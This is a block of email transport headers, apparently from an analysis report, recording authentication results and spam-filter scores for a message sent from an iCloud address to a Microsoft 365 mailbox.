                                x-ms-exchange-organization-originalclientipaddress17.58.38.41
                                x-ms-exchange-organization-originalserveripaddress10.167.242.41
                                received-spfPass (protection.outlook.com: domain of icloud.com designates 17.58.38.41 as permitted sender) receiver=protection.outlook.com; client-ip=17.58.38.41; helo=ms11p00im-qufo17291201.me.com; pr=C
                                x-forefront-antispam-report CIP:17.58.38.41;CTRY:US;LANG:en;SCL:1;SRV:;IPV:NLI;SFV:NSPM;H:ms11p00im-qufo17291201.me.com;PTR:ms11p00im-qufo17291201.me.com;CAT:NONE;SFS:(13230031)(7093399003)(43540500003);DIR:INB;
                                authentication-resultsspf=pass (sender IP is 17.58.38.41) smtp.mailfrom=icloud.com; dkim=pass (signature was verified) header.d=icloud.com;dmarc=pass action=none header.from=icloud.com;compauth=pass reason=100
                                dkim-signaturev=1; a=rsa-sha256; c=relaxed/relaxed; d=icloud.com; s=1a1hai; t=1713985945; bh=AKmWpcXkeJGU8aEQqRNBR4WewJ2oIL0y75z1Tf5dsmk=; h=Content-Type:From:To:Subject:Message-ID:Date:MIME-Version; b=fax8DJac//XtrroHl11Qdc1VcUB79UiGhqxP/kyoDNRVpTw97Ir6MoqBdAOy5ZzX0 ZxS4hsBL5WF6g6RXDUp2h/m2iudCr31EDkDU7uzfx7ZxuG7S5Yvut2Lljh0pp9J6fA HOWFeq4ZmFfExLIt+P1fNVTdNs/DnOQyTk4oOs3+By0pNKddzIwFPedJkGxC0lKQkn ABAGOMsdT19jcPyM1EWLcJa1ZKP36q/UmIJSDGXhaRkidQXuIl6zgW6QI5O9TV4dFK wsddTvl7wsWtZ32Ul86hNdcD+lTYriIWSYRP0D3WaspylYbp3zIO8rP21Giya5mU4C j43j5jCvVErqw==
                                x-ms-office365-filtering-correlation-ide861f639-b667-4cea-ef6d-08dc64927ad2
                                x-ms-traffictypediagnostic CY4PEPF0000EE35:EE_|DM8PR08MB7477:EE_|LV8PR08MB9582:EE_
                                x-microsoft-antispamBCL:0;
                                x-ms-exchange-crosstenant-network-message-id e861f639-b667-4cea-ef6d-08dc64927ad2
                                x-ms-exchange-crosstenant-originalarrivaltime24 Apr 2024 19:12:26.2273 (UTC)
                                x-ms-exchange-crosstenant-fromentityheaderInternet
                                x-ms-exchange-crosstenant-id341c5aad-39be-47a3-901e-146d297ecd80
                                x-ms-exchange-transport-crosstenantheadersstampedDM8PR08MB7477
                                x-eopattributedmessage0
                                x-ms-exchange-atpmessagepropertiesSA|SL
                                x-ms-exchange-transport-endtoendlatency00:00:05.4274365
                                x-ms-exchange-processed-by-bccfoldering15.20.7472.035
                                x-eoptenantattributedmessage341c5aad-39be-47a3-901e-146d297ecd80:0
                                x-ms-exchange-crosstenant-authsource CY4PEPF0000EE35.namprd05.prod.outlook.com
                                x-ms-exchange-crosstenant-authasAnonymous
                                x-proofpoint-virus-versionvendor=baseguard engine=ICAP:2.0.272,Aquarius:18.0.1011,Hydra:6.0.650,FMLib:17.11.176.26 definitions=2024-04-24_16,2024-04-24_01,2023-05-22_02
                                x-proofpoint-spam-detailsrule=notspam policy=default score=0 bulkscore=0 spamscore=0 mlxscore=0 mlxlogscore=328 clxscore=1011 suspectscore=0 adultscore=0 malwarescore=0 phishscore=0 classifier=spam adjust=0 reason=mlx scancount=1 engine=8.19.0-2308100000 definitions=main-2404240092
                                X-Microsoft-Antispam-Mailbox-Delivery ucf:0;jmr:0;auth:0;dest:I;ENG:(910001)(944506478)(944626604)(920097)(930097)(140003)(1420198);
                                X-Microsoft-Antispam-Message-Info gGIvjM3S8jlkjaG1514Y+p+dsUnNZykTVWsGaNbCasQG4qwomXt4pmzN7Tj1AnMo7eGDPpIZgs0CNWzGxs+KYKhdzw7dEQ7mnV6kPVElPv41Ei12T74oD94NYZHMYirP2y9nO+iq7nueaaQJtoPMwrOyybl7Epk1ErKkfc/NdxhnUytMVTCVyRugCtN9zpF+Pq5/43ombr+Y3Ph+n6whUfnV05kvp83MaFXuey+xuNWKerPbe2mcxGU26tJ2MNnve3hvrxsB4tZHJnli6CZ88/DU6djkz2qY18BWwwsvjvEX7gTixBhi0baKTlxDBbAvbUCaWJrRq1ky0fqjAYyhy424MzJFKYVEEQSC2Ok9Y3xW7aDcpMu+qsNeyAlNCv3VyvxoNG8EeD6BjGAbb1j5RMKw8UF1nd4KeSwPz8hCJUN5CIqKKO0Mbjnr8yTtcQvNvoVSU6HuWE5owThQ9XZ6Du3Y5mOzeTWbJpVq8kmlKt1iDztzfdtxYSCxcQWxdWYkBu9VJPEGHh3R7j27+QzhW0t7qXroNU52omEfawrDETdjqZMQJEIGtUxZ0JlyqhF+PNyhtK96Hqs2jPba5UmfHE0++tGlbHlM6xI8DSEZQzbIy3xnUk0CGEeeX9pGvuP/rcSCO+mkL8wjCrq5VKITk4I/1NE1TXKEr3iENcXJWe/OGZsw/eGLz1pWtju+I1hlas9cQJ9pExMkwFEvXWj7VO+kQr2A269v/KkzGKIfQ8ZyUTIQ5EvWCPDRYFw6JyNZeXptsn8uvpD4T4SPAFN6q+2D2jv2J48bGjTl8KrQRnuDIKF/OZM/3fwugaydxHh/hrXj5EQehwEsghDcSGNbqRhZGgiGC7uLuPmeSGiI5Ruo1ziRGjo+Zd9+A79Bd4kJjGl/pmBGHoCdAXPS9e0DBLq/613Y6NbHNRdU/iYRW4Mvbcx7pQOSEcCYhWgodSm8Ah6MmkbgcNrKGiTojUCL0NNH6d+utbKwF/igcCwxZl/CJg/m2FXlqJ3VuaXc88LCyuDjV+KhYDVwX67FjS4ksp9ZO+1749JwLsnJOBkUDdhF3EnlYBZQxtqJqvWgxHmMLrHPsRwgk5FH9SEPXq3DesuXMO+Q2kLgIQd6udzNyNLj5weSc4IilO5iYfN70CFy//cbrq62qMrYA6puUmgI2iGwdn03PicPm28+CYD5i+c8IbL1rJDwjP43bWfbqynkDjz6MoOipo5XjfSLoKZzt+wbTsZXpfDTG5pYmVrcMcx2acJX9GwXG+cMtCxj6fw/addJA7uyiK/UqWIzL+svDbJMfBmcuwybPtiJn8VjX51aCDo/QPI7ZG2rFJRA10647jYkjGnzYNGutuwpL7PzmXqjxpIoUYmTB6XM+Kt+4Y6LWk/QGYT+0QX+FFJc4mCeGh9bcLYdU5Z99IcXZMErQiWFK9TyzQGDFjI1+KPxA7nfU6QpgR23rhfbnpXhNxHlJ+VJHXnFWXsH1PkbP3zxpwtYOWDp/G6cLYxU7Ssn+CoT8h+IWtmAdnltZjds9eADw38SqkUjxGIoXIjXasHcgJe3t8w2lG5PsAyX6c35jzWYivi8woP4ZZVJxjRlSuae9jOFfxEAeCdSLPykrm33HsmnVyl1Wglyr/HM6u4JsOmC5B3FBuaTbISlwUHF69D59Hcri8IyjJXoB3hhci1CPIoIsu4SM8aUKKrhhDT8dQND0JwhbSPGY6Ji7AuoWQd4le9Qap2M76q6le6ZDxZpeMQ9OVoozRFneSAycf4zuZyfNyqd9+srTyp5gYFVLeXfS1ZUpzJZTuC/8z1iYGt/1g==
                                Content-Typemultipart/mixed; boundary="_002_287839a00fbfc1f1481d47c8137933c8icloudcom_"
                                MIME-Version1.0

                                Icon Hash:46070c0a8e0c67d6